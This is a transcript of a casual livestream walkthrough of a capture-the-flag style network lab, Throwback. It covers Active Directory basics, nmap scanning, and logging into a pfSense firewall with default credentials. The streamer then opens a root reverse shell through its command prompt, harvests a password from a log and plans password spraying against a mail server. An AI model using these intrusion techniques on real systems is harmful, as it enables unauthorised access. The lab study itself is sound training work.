 Hey everybody, this is a super duper long video and there is a reason for that. This is part one of me attempting and walking through and learning and going through Throwback, the new TriHackMe Networks lab environment to kind of work through a internal penetration test of doing some Windows Active Directory stuff and a lot of that was new for me. So it was a kind of low tempo casual chill stream that I originally put out on Twitch. So I hope to continue doing that. And if you guys have any interest, please do check out my Twitch channel. Hopefully I'll be able to do more streams like that that are kind of long form and chill and you can kind of see me being a goofball and I don't know, doing a little bit more than just the normal prepackaged videos that you might see and stuff here on YouTube. So hopefully that'll be a little bit of interest for you but if you'd like to check it out, I think it's twitch.tv slash johnhammon010 and hopefully we'll be able to do more of it. I'm gonna continue up, this is part one of Throwback and I'm gonna continue to do more of it but a lot of people ask, hey, will this be up on YouTube? And yeah, absolutely, it'll be up on YouTube. So admittedly this video might be hard to watch as a video. It's gonna be a little bit disjointed because I don't have a display up for like the chat or what people are saying and I just try to respond to them and that might seem random and ad hoc. And I also just started recording in OBS like maybe five or so minutes into the stream. So the kickoff, the start of the video is like, whoa, suddenly we're doing this and I realized that might be a little bit disjointed but for posterity's sake, I wanted to include this. I wanna upload it to YouTube and I wanna offer it to you. So if you have any interest, please check it out. Long, long video but you get to see me, I don't know, letting my hair down a little bit more than I usually do in some YouTube videos. So I'd love to see you on Twitch. We'll continue more of it hopefully and we'll do more of throwback but here's the video. I hope you guys enjoy in this long artifact of like six hours and probably gonna be even longer after the other ones. This is just part one but we'll keep doing it and we'll learn together and it'll be a lot of fun. Thanks everybody, enjoy the video if you watch it for some reason. Take care, I'll see you soon. Let me know if the stream starts to die because I'm doing that, hopefully my computer is, hopefully my computer can handle it. This is an active directory forest visualized. Okay, so let's say we have a domain trackme.com and then other domains like east.trackme.com and forest, excuse me, west.trackme.com. Those are hierarchy of domains and this is where I still get wonky. So you have like one domain, right? Right. And that is a tree, is that right? And then you can have other domains that are also trees and those make a forest, is that right? Help me out chat. I got a monster here because it's like eight o'clock at night and I'm gonna be doing this for a while. Where's the sub button? Hey, Wester, how's it going? I don't know, where is the sub button on Twitch? The domain admins are the big boss. That makes sense. They control the domains and the only ones with access to the domain controller, that makes sense, they're an administrator. Service accounts can be domain admins. These are for the most part, never used except to service maintenance and they're required by Windows for services such as SQL, SQL to pair servers with a service account. Local administrators, these users can make changes to local machines as an administrator but may even be able to control other normal users but they cannot access the domain controller because they're tied to that physical machine. They're tied to that computer. So in the case that you aren't in a active directory controlled network like a regular Windows computer, then you have a local administrator account. Even if you are in a domain, you can be a local administrator on that computer but if you're not the domain admin, you don't have control over the domain. Hence the names. So hopefully this is the first of many streams. Yeah, so I'd like to be able to do these like every night ideally. This is kind of an interesting one off because my girlfriend has a night shift currently at work so I'm gonna be able to hang out and chill for a long time. Domain users are your everyday users. They can log into machines, they have authorization to access and they may have local administrator rights to the machine depending on the organization. Then we talk about policies. So domain policies are like domain groups except instead of permissions that contain roles and instead of applying only to a group of users, the policies apply to domain as a whole. It simply acts as a rulebook for the entire active directory structure that a domain admin can modify and alter as they deem necessary to keep the network running smoothly and securely. Okay, so the domain admins are the one that can make the rulebook that is the domain policy. I will once again believe that. The options for domain policies are almost endless and a big factor for attackers when numerating active directory networks I'll outline it just a few of the many policies that are fault and you can create an active directory. So turn off the, or like Windows Defender turn off your little built-in antivirus. That's the thing. Digitally shine communication can disable or enable SMB signing on the domain controller. Okay. Domain services overview. Domain services are exactly what they sound like. They're services that domain controller can provide to the rest of the domain or tree. There is a wide range of various services that can be added to a domain controller. However, in this room will only be going over the default services that come when you set up a Windows server as a domain controller, I'll unblower the default domain services. LDAP, that makes sense. You see that often Windows World, WW. Certificate services allows the domain controller to create validate and revoke publicly certificates. I need to get smart on some of that. DNS, yeah, that's again, probably something obviously I would think I would expect you to find out with a domain controller knowing that what it does. LLM and R, I need to get smart on that too, and NPNS, NBTNS. So let's dive into that. One of the things I'm really, really looking forward to with this throwback network is hopefully being able to learn a little bit more about that and get into it, so. LLM and R is a pretty famous protocol to hack. I see, that's why I need to know. Like, that's why I need to get smart on that stuff. The domain authentication overview, and that's the most important part of Active Directory. So Kerberos, right? As well as the most vulnerable part of Active Directory, that's great. Is the authentication protocols in place? There are two types of main authentication, NTLM and Kerberos. These will be covered more in depth later, great. And there is an attacking Kerberos room. Ooh, let's click on that guy. Sweet, yeah, maybe I should pour into that soon enough. There's also a lot of info on this, okay, okay. I got a lot to learn here. Kerberos, that's the defaults. That uses the ticket granting, tickets and the service tickets to authenticate users and give access to the rest of the resources throughout the domain. So you hear a lot of time Kerberoasting, right? So I think that's a kind of abusing whatever that ticket granting ticket scheme so that you could get a ticket and like card yourself in the network. I think I've heard of like, obviously, like the golden ticket attack and the silver ticket attack. Is that a thing? Is there a silver ticket attack? No silver play button. You can tell that's like in my recent Google searches. Look at it, look at it, he's right here. Wow, wow, wow, wow. All right, now we'll never see him again. It is a thing, it is a thing. I'll learn more about that. Is it just as nasi, just as nasi and evasive and it's even stealthier? I'll do some reading on that. All right, unless someone in the chat just wants to like drop knowledge on the incredible thing that apparently is a silver ticket attack. Active Directory Domain Services is the main access point for attackers. Now that we understand the basics of Active Directory, we can utilize this knowledge in the lab environment and get a hands-on with these concepts. All right, great, I did it, I read it, I'm good. Ooh, more scrolling. PowerShell, ooh, ooh, ooh, ooh. PowerShell is the Windows scripting language in the shell environment that is built using the .NET framework. All right, now we're making a hard pivot. Took a big left turn going from what is Active Directory to now what is PowerShell. Okay, so I've actually taught PowerShell before back in my teaching days. So it is a very verb now in English-like syntax. You'll have a get and all these things that are verbs. Get help is a godsend. Get command is also a godsend because in CMD.exe you don't have a command that will tell you all the commands. So, and you can also use whatever cool globbing you want there with a wild star, wild card, excuse me. I actually feel pretty tight on PowerShell so I don't think I wanna spend as much time in here. I'd like to get us to some real cool on the keyboard stuff and I've actually put out some cursory videos on PowerShell. So, oh yeah, they're talking about the select command specifying first, last, unique, et cetera. And filtering with where. You can use the question mark as an alias for where. Wow, wow. If I recall, SilverTicket is a force ticket for a user, could be a diamond. Yeah. Ooh, GoldenTicket is for, yeah, for the Kerberos ticket granting ticket which is the big boy. I like how you put that, Western, thanks. Okay, PowerShell, PowerShell, PowerShell, offensive PowerShell. Import module. I guess I can like tinker with this. I don't know how well this will work if I fire up a virtual machine while I'm trying to stream and record. Let's see if my poor Dell XPS can actually handle it. I have a Windows 10 virtual machine. I don't need to create a snapshot. Let's just fire that bad boy up. Let's see if we can do it. I was actually using this machine to test some malware that we kind of found at work. So you can see my snapshots here that say before malware when the defender, Windows defender was still on. All right, come on down. I know you're restoring the virtual machine but you can at least show your face for all the kids at home. For everyone watching, look, it's Windows running on Linux. It's the LSW Linux subsystem for Windows. Okay, come on back. Great, we got PowerShell in here. Tell me if the stream starts to die because I realize I am running probably some hefty, hefty software on my poor Dell laptop right now. Nightwolf, hey, good to see you, my friend. Okay, Windows, just keep restart and explore. Realistically, I have another Windows computer beside me and I could like VNC or RDP into that, I guess. Can I click on the start button please, PowerShell? Can I type literally anything? This is why I can't stand virtual machines, especially Windows virtual machines. Check it out. Here's my little carbon think pad, X1. And if I open up the screen, you can see it has the Windows logo on it. So therefore it is automatically running Windows. Apparently we're not gonna do this. Apparently this just isn't gonna happen by Windows. So I will be able to press the I believe button on this though I know this in tax for import module and you could do this probably within the Linux PowerShell. But I don't think it would like do a good job. Push, as you properly pronounce PowerShell. I wanna, it's like a snap package and you gotta do that with like classic. I hate dealing with snap. That is a big ripe that I have for my Ubuntu realm. Yeah, see like use classic, tech tech class. It's like, just do it, just do it, just install it. Does John use Teamux? No, I do not, I should. If I were a smart, intelligent person, I would be able to type Teamux. I don't even have installed. Wow, that's embarrassing. Is Pwush just push work? How are you supposed to pronounce that? Yeah, so that's a thing and you could import a module, maybe import module. Yeah, yeah, you could do it. Obviously a lot of this stuff just isn't gonna happen though. So I think this goes to, can I actually import module Active Directory in this? Import module and there's no hyphen in there? No, whack that. Yeah, and so the Linux side obviously is not gonna have any idea what that is. Like what are you trying to do? Why are you telling me about Active Directory when I'm running a Linux kernel, buddy? But I know that that is a thing you can do, like get 80 domain and get 80 forest. And we'll do this on the boxes. So I'm not extremely bummed that I can't give you a demo for that. But PowerReview obviously, part of PowerSploit is fantastic and awesome. And I need to get a lot more familiar with it. I also started to watch some of a security tube or what is it, Pentester Academy now, right? Oh, hey, anyway, hey there, I was quite hyped to learn that you were teaching at Wall Sheep. I was there too, I was doing a D. Oh, awesome, thank you, appreciate it. Yeah, Wall Sheep's always a lot of fun. Riverside is a great dude. I consider him a mentor to me in a lot of ways. He's cool, he's very good. And PowerSploit also has these other modules and stuff that you could do or these other commandments you can run after you import the module. Did they cover that already? Did they cover the import module syntax to actually run PowerReview? I would have thought there would have been a screenshot for that. Whatever, they might have. My phone is going off. Chill casual streams. Real time with John. Oh, I got a new write-up submission on Peekill. Check it out. Cool. Yes, I know the PowerShells. Entering the breach, my friend. What do we got here? Ooh, actual things, actual stuff. Are we doing it for reals? Are we going? Your TAC team has run initial reconnaissance on the target, throwback hack security. They find that there are three machines that are publicly facing throwback production, throwback foo, throwback mail. Your team has informed you that these assets are publicly accessible and it's your job to perform additional reconnaissance of these machines and find the way in. To accomplish this, we'll be using NMAP. Ooh, I know NMAP. This NMAP command is very stable. Are they going to hate us if we use RustScan? What is my IP address? What is, what is, what is, this running in right now, ton zero, ton one. Yeah, I am connected with throwback, am I not? Yeah, so, wait a second. Tell me what I need to run, 200X? Should I be able to actually ping that? Should I be able to actually reach that? Like now I'm just sketched out. Can RustScan use an entire subnet or is it just going to like die? This told me that I was a dot two. So is that what I need to run? Do I need to run a dot two? No, RustScan doesn't know how to do that. Give me a box IP please, please. Just for like a sanity check. Just so I like no, 138, yeah, that's a thing. Is that right? Give me something. Can you tell me my IP address, dot 24? I should be able to see the outward facing public stuff, throwback mail. Oh, dot 24, dot 24. I now understand. Oh, I can move this around. Incredible, 24 and that one was 232. Let me just like check that just to know should there be ports? Should there be packets? Should there be connectivity? Should there be any response whatsoever? This is where I'm like, oh God, the world is ending. The stream is awful. Everyone hates me. It's running. I am connected, right? Right? Am I connected? I literally see open VPN running. So I know that I'm going to just straight up wrestle with the stuff. Networks, throwback. You don't think that I'm connected. Is that so? I literally see this connection restarting. You know what? Maybe when I downloaded this thing, LS downloads John Hammond. It's just not a thing apparently. Okay, network open VPNs file. Let's just regenerate this bad boy. Let's let him go. Let's let him have his new love. Let's download that. Oh, you know what? It's probably wrong. Because it didn't have that hyphen throwback in there. Let's slap that in this directory and let's get removed. Let's get rid of the old troll that would totally screw me over. So now I should be able to see the open VPN John Hammond.throwback with the password in there. Cool, cool, cool, cool, cool. Now can I pretty, pretty please ping? Oh my God, computers work. The way that they're supposed to. Only if you do it right. If you do it right and you don't screw it up, then it works. And that gave me an actual IP address that it should be and not my regular try hack me IP address. Great, incredible. Human error, once again, ruins the day. Thanks for, thanks for bearing with me chat. Hopefully I get to be a little bit more of a, I get to be a little bit more of a clown than when I do in a regular video. I guess that's the benefit of just chilling. Let me take a quick swig of the monstee here. Now we can do the end map scan ping rust. Let's just use regular end map because I don't think rust scan will actually behave with the slash 24. Will he do it? IPs. Can I supply a subnet? A list of comma separated values. I don't want that. I want to supply a subnet. Whatever. Let's use that. This guy here, 2024. And we are still 24. So yeah, let's slap that in. We could start off this video like we always do by opening up a read me file and creating an end map directory. Tacka C, tack SV, tack ON, end map initial on 10, 224 slash zero slash 24. Let's whack a V on there. So we actually get some verbose output and see what we're up against. Hey, Sirlik, yeah, thanks so much. Of course I'm gonna enjoy it. I appreciate you coming to hang out. You can watch me completely fail at this. Yeah, California's trolling me. Now I'll use the read me throughout the stream. I'll never touch it again. Great. So we can sort of peel and look behind the, oh okay, yeah, he found something. I was gonna say we can peel behind the curtain because some of these screenshots will tell us the IP addresses that we should be looking at, I think. So we've got some hosts. 219, 232, and I see a 183. That is extremely large font. Slap my name in there. Use a zero instead of an O because I'm late. I'm just kidding. Please don't take me seriously. What day is it? It's still September 5th over here. I don't know how it is on your side of the world, but hosts, 138, 219, and there was a 138 that I already said, 219 and 232, 232, 232, 232. Bigger font. Can you guys not see that? Is my font big enough? Can you guys see this? Great, because I can't. That's why I wear glasses. Wow, John is late. Oh, you guys are the best. Oh, I love hanging out with you guys. Okay, end map is still going. Holy cow. I'll get those end map scans eventually. I didn't even use attack p. I didn't even use attack p-tack. I just said give me the first coolest ports under like the most common 1000 ones. I mean, we could just dink in Russ scan this if we wanted to, just get like all of the, just get all of the end map scans running at the same time. Russ scan, slap these bad boys in. I should stop saying that. Russ scan.txt. Boom, ports. Ooh, WinRM. I learned that today. Not today, but I recognize that much more easily now after doing remote from hack the box. I need to do some more hack the box. I want to jump in on some of their prolapse too, because this is where the good learning comes in. And we're having fun. So is end map still going? He is. Let's do some deductive reasoning. I'm sorry for like flailing these windows around really badly, sorry. 138 is the one that has port 53 open and port 80. Is that the IIS one? Can we assume that's IIS? Can I please load this page? Eight things we do that really confuse our dog. That's what I go to the internet for right there. Oh yeah, I'm hogging. This is probably hurting the network because I've got like super scans running right now. Yep, end map kicks off again. Now that one is actually almost done. So certificates, PF sense. Oh, okay, sweet. 138 is our PF sense box. I should use duck.go. Yeah, that'd be a good idea. Am I good at reading and writing regex? Yeah, I think so. I hope, I hope I am. What do we got? Let's sub all this end map initial and kind of kind of get a better idea as to what we're really looking at. Ooh, a lot of the tack V is gonna give me a sweet, sweet output of everything that's not responding. Let's nerf some of that. Okay, open SSH on 138. And okay, 138 we know is our PF sense box. PF sense login, good. 183 is our web server and that's the IIS. We see a domain throwback, DNS domain name throwback.local. And that's, I think what it was asking earlier. So, and then this must be mail? Yeah, okay, yeah, obviously I see 143 in Dovcott. So that's totally mail. Incredible. We're lead hackers. We understand the results of end map. What's the domain name? Throwback.local. What's the HTTP title of the web server running on throwback prod? Prod? Microsoft IIS? Is that what it's asking for? There's no way. No, it's not. Where's that prod boy? See if a different web server? What's the HTTP title of the web server running on throwback prod? We found prod and he is, oh, this is throwback hacks. Is that right? That looks like the total number. Correct. Will this stream be saved on Twitch to watch later? Probably. Oh yeah, was I looking at like the totally wrong field? Chat was yelling at me like, hey, it's HTTP title, you stupid John. Am I going to stream more over on here on Twitch than I am on YouTube? I don't know, honestly. This might be a one-off, I don't know. I'm gonna be doing this for the next three days and I also have some gifts for you guys, for those of you that wanna hang out and chill and stay with me. I'm super duper grateful for that. I'll try and share some stuff soon. One, two, three, four, four. Are there four? No, I'm looking at mail. Yeah, is it just four? I should probably run an all-port scan, but sweet, that's right. What service is running on FWAH SSH, DNS? Yeah, that's kind of weird. What is it? Are you just asking for a PF sense? Yeah, okay, you're just asking for a PF sense. What version of Apache is running on throwback mail? We see throwback mail as to, we should probably, I should probably keep track of those. 232 is throwback mail, you are throwback prod and you are throwback FWAH. It's 2.47 a.m. Yeah, that's the, sorry. I realize the time zone is pretty awful. It's literally gonna be like two in the morning when I'm done with this too. I mean, hopefully I'll be going for a long time. Thanks for the, yeah, congrats on the YouTube accolade. Thank you so much. It's right here. I might just have to put it back on the wall with all the other stuff. Use that, read me. Yeah, great job, John, prove me wrong. A version of Apache, we still need that bad boy. Apache, control F to victory. Incredible. All right, we did that. Now we can explore the caverns. We have not yet reached the realm of, that's beyond my understanding, I think. I'm okay with running NMAP. You've ran your scans, and now it's time to revisit the web servers and see what services are running on them. Your team decides it's best to enumerate prod, mail, and FWAH. I'm just gonna call it that forever. Enumerating web servers. It's important to do that. I guess that's all we're gonna get. Production server. For back hacks, securing what matters to you. Yeah, let's fire these up in the web browser and actually see what we're looking at here. We got our PF sense, boy, but we should see what our prod looks like. That sweet, sweet Apple computer with the rainbow screensaver. We know security, lorem ipsum, delorsit, amit. Summer's winters? Oh, I love that. 150 plus meetings. We didn't know we were signing up for a comedy show when we said we were gonna do try hack me throwback, guys. Ooh, further inspection of the website reveals a list of employees, location of the company. I should actually probably scan some of this, sorry. I should do the real stuff that I'm supposed to do. Let's make a directory for hosts and let's make a directory for prod. So we should be able to spin off a cheesy Necto. I guess this is probably just me doing these things out of habit. Maybe this is not exactly the direction I'm supposed to go in, but I don't see anything that's wrong with doing it. We'll also slap in a little hosts prod. Do a little go buster, I guess. Is there anything wrong with that? Is anyone gonna yell at me if I do some go, go buster? And let's continue to actually look at this thing like manually, because we do have team names, so maybe that would be worthwhile to capture. Did these give me real email addresses or these contact button fake? Yeah, these buttons are fake. Whatever, we can, if we're doing this like a real cool pen test, right, we should probably keep track of some people that we can cyber stock and perform OSINT on. Summer's winters is obviously the villain in this fairy tale. Services, there is an email address that I see and let's actually slap some markdown headers on these. So we're not just a poor man in plain text, even though we are. Work. Oh, these just bring me to different places. They don't actually do anything. Is there anything peculiar in the source code? Again, probably just habit. This is probably not something that I need to care about. I shouldn't be making assumptions, but you guys know me. Why do I put my notes in the code tag for markdown? I don't know. Admittedly, I just kind of do that when I know there's gonna be like listing or stuff. I actually just kind of do it so that the color triggers in sublime text. So maybe that's it. Alrighty, did we get anything from Neekdale or any of those things? PHP info, excuse me? We just happened to have PHP info hanging out? Incredible. Sweet. We should, I guess, make a little read me in each of these here. So I'll do like a productions read me just to include all these notes. And that was an interesting thing that we have PHP info just on the page. Nothing else though. West are saying control F for a little flag format. Where's my flag? Where's my ROT 13 base 64 Caesar cipher? That's still ROT 13. And then write the mail server. All right, so that's running squirrel mail. Guess to require email, excuse me? What the heck is that? Yeah, I can go check that bad boy out. I should stop saying. And I don't know why that like rolls off atop my tongue when I'm producing content. Let's say cool hip things that people really like. Ooh, multiple read me files. I'm in my final form. Yeah, this is my fourth evolution. Ha, ha, ha, ha, mail. Subtle red meh. I should slap the IP address on here too. Whack. Get out of here, virtual box. Okay, I can just straight up log in with this. You probably shouldn't have a username and password literally sitting on the front page, but I'm cool with it. Oh my God. I found a flag. Sweet. Thanks, thanks Firefox. Thanks for letting me copy that. The entire div. This is something that I can go put in the flags emission panel, isn't it? What's the email found in the guest inbox? That, ha, ha, you're no match for me throwback. What do you think? That's a flag one out of 26. I'm on the road to Viridian city. Yeah, I guess I can like, another good thing to do would be keep track of like usernames and passwords. So we should also start that list. Let's also start a flags section. And I should have probably like took note of what was actually what is the flag in the first email with, what was it like the guest email within the email server? Am I doing the whole room on the stream? I don't know. So obviously this is gonna be a very, very long like network to work through, not just one room. And I will go for as long as I can tonight. Don't take that out of context. I don't have anything else going on. So I'd love to hang out with you guys depending if you wanna hang out. But we're at 53 minutes in and we've gotten like a decimal 2% of the way done. Oh yeah, what was I doing? I was saying that we should start a username and password list. We found in, I need to clear out some of my, some of my sublime text windows. Let's throw in like a usernames.text and let's create a little like passwords.text if just to keep track of some of this stuff. Great. Now we are back on solid ground. Is there anything else that we could do with this? Welcome to Throwback's guest email. I kind of just saw this flag and was like, oh my gosh, and didn't read any of this. Keep in mind you send is not private and could potentially be viewed by anyone. Gotcha. Okay, that was the only thing in my inbox. I don't have anything sent and I'm just living as a guest right now in this email server. I'm just a poor person mooching off of someone else. As a guest. So, great. Is there anything else we need to explore here? Immediately upon visiting the throwback or firewall, we can tell that's running a new version of PF sense. As this firewall is accessible to public, we can assume this is an outlier firewall designed to keep attackers out. Your team informs you that it's your decision to attack what target to attack first. All can be good attack paths. They suggest attacking throwback firewall first. However, the decision is yours. Who is the CEO of throwback hacks? Well, that was Summers Winston. I, excuse me, Summers Winters. I did my homework, guys. I learned the seasons in a year. Where's the company located? That was in Great Britain. I remember that. What is the guest username on the mail server? I saved that in a file. Guest password, holy cow. We're four for four, everybody. Only a thousand more to go. All right, web shells in you. Are we gonna be beating up this PF sense box? Yeah. Your team has informed you that the PF sense box may be running in a default configuration, which means gaining access easy or the default credentials like admin and admin. Use this information to your advantage and gain access to the PF sense configuration panel before moving on. After logging into the PF sense config, wait, what? Is it literally, it's lit admin, is it, I think it's like admin PF sense. Isn't the default password, PF sense admin, PF sense? Or is it like PF sense, PF sense? It's loading. It's, great. Default value passwords, nothing wrong with that. It's secure. After logging into the PF sense configuration panel, we're greeted by a dashboard showcasing the status of the firewall. Is it off? M-pinger, yeah. Default password is please sub. Thanks, evil muffin. I appreciate that. Is the Game Boy yellow like a reference to something? I don't know. It reminds me of my Pokemon yellow days, though. It reminds me of Pikachu following me around. To use PF sense to our advantage, we'll look for a command prompt or a web shell to execute commands and then get reverse shell. There is a thing you can do, isn't there? Pseudo, excuse me, what the hell is that? What? Is this like setting, et cetera, sudoers? All users. Can I add one of these? User. Oh, I can add a group wheel. Let me keep that in the back of my mind. What else we got? Advanced. Let me just poke around for a little bit. I'm sure this thing will guide and tell me. But I think there's something that like, you can just run a command. Ashboard services. Diagnostics tab. Thank you, chat. Command prompt. Easy to shell command. Who am I? Dope. Can I get a little reverse shell in that? Can I like download a file? Yeah. Let's slap a little, wait a second. This thing has SSH on, doesn't it? We saw that. We did see that. I thought. Where's my end map scan? Yeah. PSS login with SSH open. Can I get like a root shell in there? Like a SSH? It probably won't allow me to like SSH's root though. SSH root. I should probably add these all into my et cetera host file too, because I'm doing a lot of stuff here. I'm gonna be keeping track of a lot of machines. Yeah. Okay, probably not. I can just add a user, but then I'd have to like put him in the file. I'll just get a stupid reverse shell. I don't know why I care so much. I just want to get a reverse shell cheat sheet. Actually, let me just cat it out from my poor man's pentas stuff. It's this bad boy. Let me do a bin cat, because bat is gonna try and display that in a weird way. Forgive me. Reverse shell, point cat incoming. You know, I probably honestly should. We can try it just because you mentioned it. Let's do a little F and I always forget. What's my IP? What's my IP address? We don't need spaces there. Zoom in so the world can see my public IP address. Just kidding. Let's go, what are you feeling? What are you feeling guys? Are you feeling quad four? Are you feeling quad five? Quad six, quad nine? One, three, three, seven to be lead. Let's go quad four. Let's roll some straight metasploit. Oh, dude, you guys are quick on the trigger. Oh, sorry. You were like immediate. Quad eight, John. Yeah, let's get the Pongcat boy in there. Get Pongcat, how do I do this? How do I run Pongcat? Bin activate, please do your God type on the keyboard. Source, no, now it's just Python. Python, M, Pongcat, attack, LP, quad, quad four. We did quad four, didn't we? Are you doing it? Are you doing it? Yeah, you're doing it. Okay, sweet. Run the command. Done. Let's see if this actually gets back with anything. Am I using terminator or Tmux for terminal splitting? I am just using terminal, terminator, excuse me. Why? Why? Let's just do it, regular stupid. What is going on in my, you guys can't see because my face is in the way probably. Let me just close this for, let me like turn my face off so you can admire this Jojo Jojo Jojo down here. Computers are weird. Do it again. Do you not have SH? You don't have bash. Oh no. See, Pongcat would have just worked just fine if you told me that earlier. I don't need that. Pongcat would look really gross, but it'll do it. I supposed to do it anyway. Okay, start the listener. Throw that guy in there. There we go. Now we got a shell. We just straight, yeah bash doesn't, yeah, yeah. Pongcat's ready. We're on the box. What do we got? Spooks. I should, I should, I should read. Traditionally, web shells have represented to the extent of means to an end. However, they can be used in more permanent scenarios. Common limitations world includes simple command execution, simple reverse shells that can be caught with netcat, meterpreter shells. Yep. Yeah, yeah. So I'm already root, I'm already root. You can tell by by incredible octothorpe there. Did I, yeah. Okay. In order to execute commands in a web app, firstly define our vector that execute these commands. The web shell can be a command line interface directly integrated with the web server, a limited functionality shell, or a PHP command execution shell. I'm not too concerned. What username was used to access the configuration panel? We ran admin pf sense. What menu tab contains a command prompt? Diagnostics. Straight from the chat. They answered that themselves. Incredible. Now I've got the shell. I caught my reverse shell already. Don't forget my read me. Oh, you're right. Thanks everybody. I should keep track of that. I should keep track of my read me. Thanks for keeping me saying guys, that go buster scan does not need to be running anymore. We also need all of these things. Let's make a directory for foo. The firewall. Let's make it a little entry for him. We can just say throwback foo. And owned with admin pf sense. Default credentials. And then net cat reverse shell. Running as root with no bash. Great. Now we want to find some log files. Excuse me. Yep, yep. We got a reverse shell. I guess we didn't really need to do the whole, oh execute PHP command ones. That's fine, whatever. Yeah, they use port 53. They had much stealthier tradecraft than I do. I literally chose port quad four. I'm like, I'm a straight bad guy apparently. What log file it's found that is not a default log. What are you talking about? Are you talking about in like var log? Var log pose. Oh, flag dot text. That doesn't sound like a normal log file. You fools. That's not what it's looking for though. There's five characters there. Wet, wet. What are you asking? The hash of the user? Nightwolf has a flag dot text in var log. Login dot log. That's kind of odd. L2TPS is kind of odd. I think. Derek, what is that? What even is that? Do you guys have a log in dot log? Oh, log in dot log is weird. Are you guys throwing Pokimane emoticons? PogChamp KeckW? Yeah, let's keep track of these. Var log log in dot log. That has a little password. This guy Humphrey. I appreciate all you guys hanging out. Part of me was like, man, part of me wants to do this on YouTube because that would be kind of like, oh, it'd get the whole audience. Like rather than 47 people here, there'd be like 400, which would probably be cool. But I thought like, you know, let's just dive in. Let's just, let's get a, let's rip the Band-Aid off and get some Twitch going on. I don't have any cool like neon lights though. And I don't have like the, I don't have any of the crazy effects going on between like, oh, there's my face off on the side and there's my chat and there's a, the gift sound whenever someone throws in subs or submits bits, whatever the heck those are. I don't have any of that. I just like, let's, let's make the content first, you know? I'm pretty homegrown. A little background music would be nice. Dude, I can sing if you want. I'm kidding. What is the name of the user that you found? Not gonna sing guys. John will love Humphrey's last name when I get to, oh, no Humphrey W. I'm scared. What, what could that be? What is the flag? Did the, did the prompt tell me to go to Varlog or did it just kind of like, was I, did I land in Varlog and I just not know? There's nothing wrong with it. Cause like, I think I was able to at least deduce that I'm supposed to go over to Varlog to look for log files. But, oh, someone linked to YouTube video. What is this thing? Turn my volume off. Oh God. Oh, it's hackers. It's hacker movie. Appreciate that clip. Do you want me to like, watch this right now on the stream? Is this the, is this the, the rabbit coming? Oh, sorry. I didn't realize that sound was on for you guys. I'm so sorry. It's replicating eating up memory. What do I do? Type cookie, you idiot. I'll hide him off at the pass. He's doing it like I do. He hits his keyboard like me. All right, give me epilepsy warnings for this thing. Thanks. Thanks for the fun, everybody. I will, I will treat YouTube links that you send in my chat with caution. Sorry, I hope that wasn't like ungodly loud. The only service that you have left to attack is a mail server. What? Wait, what? What about the web server? What happened to the web server? Am I supposed to do the web server? All right, optional send in YouTube links now. You're sending bitly links? No, guys. Ooh. Are you sending me like awesome music to play? Some like regular trance music. So have you guys ever heard of the midnight? They're a group that produces music that I like a lot. They're kind of chill, like kind of ambient 80s sort of thing. Okay. The only service you have left to attack is a mail server. Are you telling me that like this password is just gonna get me into, like what is, is this a hash that I'm actually supposed to crack by the way? Did I, you guys distracted me way, way crazy hard. No, is the music playing? I turned it off. Let me figure out how to properly twitch first before I try to put on music for you. That hash is security center. Okay. Stop distracting me, everybody. Should I just, can I just get into the web server with that though? 422? 422? Yeah. What box? 219? 219? He has a satrippant. That's not like a username though. Does twitch streaming and says chat, please don't distract me. Yeah, I'm sorry. I'm a jerk. The whole point of, I guess the whole point of chat is for you guys to distract me. So I'm confused. Are we supposed to be doing the web, web server? It said the last one, did I skip something? I don't think I did. Let me just try an SSH with that user. Because maybe I just straight up can. Humphrey W. Let me grab that. I guess I should add this to our list of user names and passwords too. Humphrey W with an at sign, please. Yes. And password is security center. I could type that, but I know I didn't type it wrong. And I probably hit the backspace like 70 times. So, cool. Maybe that's not what I needed. Regardless, let's throw these in our user names. Humphrey W and security center. Okay. Uh-oh. Serylix onto me. It sounds like I should just kind of keep moving forward then. It sounds like I'm just being crazy. As usual. The only servers you have left to attack is the mail server. Your team has suggested that you try password spray using the contact list from the guest accounts as well as sending phishing emails to the users in the contact list. Password spraying is using one password attempt to log into a list of users, typically with a common weak password. In a realistic environment, humans the weakest link. If the environment has a weak password policy, oftentimes you can spray for common weak passwords based on a very condition of the year. Yep, like season and year. And they offer some examples. Oh, I'm trying to make the text big enough that you guys can read it. Can you read that? Okay. The attack service for password spraying is fairly broad. All you need is a field to submit a username and a password. And you can password spray against that login. Even if there's not a login portal, you can still sometimes password spray against it. What? Oh, Kerber it. Okay. We're going into Burp Suite. No. No. Oh, I hate Burp Suite. I don't hate Burp Suite. We're doing this on the mail server though. I guess so. Cause that's probably an SRC login, isn't it? If I go, yeah, source login.php. Oh, we just get the headers with Hydra so we can use them with Hydra. That's fine. I think that's fine. Hydra is typically used as a web location login proof. Yeah, I know all those. I know that. I do need to go ahead and put together a better user list though. Did it cover that? No. I guess I'll just try it. I guess I'll just make stuff. So let's go over to a second pane and let's put these names together and let's just say in our user names list, don't overwrite it, don't save it. Let's bring that over here and let's make a Rika, Rika Fox or Rika or R Fox. Same thing with Hugh Gongo. We'll do a Hugh and an H Gongo. Same thing with Jeff Davies. We'll make a Jeff and a Jay Davies and a Summers, Winters, a Swinters. I like that a lot and Summers. You have an account on the mail server to use. Am I misunderstanding? I could do that. Oh, I guess I could just kind of like look at their email addresses. You're incredible and I'm not. This is great. Oh, and there's a flag. Thank you, yeah. Speaking of flags, I should have submitted this one from earlier. What is the flag in the guest contacts page? I didn't even submit that. So let's take him and slap that in there. And so I'll put that in our read me. I'm sorry, I didn't even go into the contacts page before and that's why I failed at that and didn't even realize I didn't know that was a thing. What is the root flag on throwback? Fua, it's this guy. Thank you. Thank you. Thank you chat. Excuse me. Oh, log flag. I didn't even, I didn't get the stupid root flag. Let me go back there. CD to RPT? Holy cow. Learn to type, John. Root dot text. Leet hacks. Leet hackers. Sorry, sorry. Frantic alt tab. Epileptic, sorry. Go from white screen to gray screen repeatedly. Sorry. Just doing it again. Sorry. Okay. Now we have users and contacts which are very, very helpful and I want all of these. Please give. Please, please give. Select. Let's open a new sublime text tab. Let's de-dent all of this. I don't want that data. I do want all of this and are those nicknames? Those are nicknames. Yeah. Let's take them and throw them into our users, our user names, just for the kicks, you know? And I don't need that reverse shell syntax anymore. The names of characters. Bojack Horseman is here. Oh my gosh. I don't even watch that show. Caleb does though. Caleb is like, Caleb really, really likes no reply, no reply. Emails. Let's take some of these guys out. Thanks for sticking with me, everybody. I realize, I killed the no reply line. I realize that we've been doing this for a little bit of time so I appreciate you all sticking with me. Great. Yeah, it's like 2.30 in the morning. You guys don't need to do that. What text that there is is, I'm using sublime text and I killed the L and throwback local. Emails.text. Keep track of those. Yep, yep, yep, 